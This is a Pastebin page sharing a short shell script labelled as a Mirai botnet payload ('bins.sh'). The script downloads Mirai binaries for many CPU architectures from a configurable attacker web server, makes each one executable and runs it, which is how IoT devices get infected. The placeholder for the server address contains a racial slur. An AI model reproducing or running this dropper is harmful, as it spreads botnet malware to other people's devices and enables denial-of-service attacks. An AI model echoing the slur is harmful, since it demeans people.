Advertisement
GodAres

[Bins.sh Mirai Payload]

Jun 6th, 2017
1,404
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. # Gucci Ares
  2. # Kik:XVPL IG:Greek.Ares
  3.  
  4. #!/bin/sh
  5.  
  6. # Edit
  7. WEBSERVER="IP HERE NIGGERLIPS:80"
  8. # Stop editing now
  9.  
  10.  
  11. BINARIES="mirai.arm4n mirai.arm5n mirai.arm6n mirai.i586 mirai.i686 mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.spc mirai.x86"
  12.  
  13. for Binary in $BINARIES; do
  14. wget http://$WEBSERVER/$Binary -O dvrHelper
  15. chmod 777 dvrHelper
  16. ./dvrHelper
  17. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement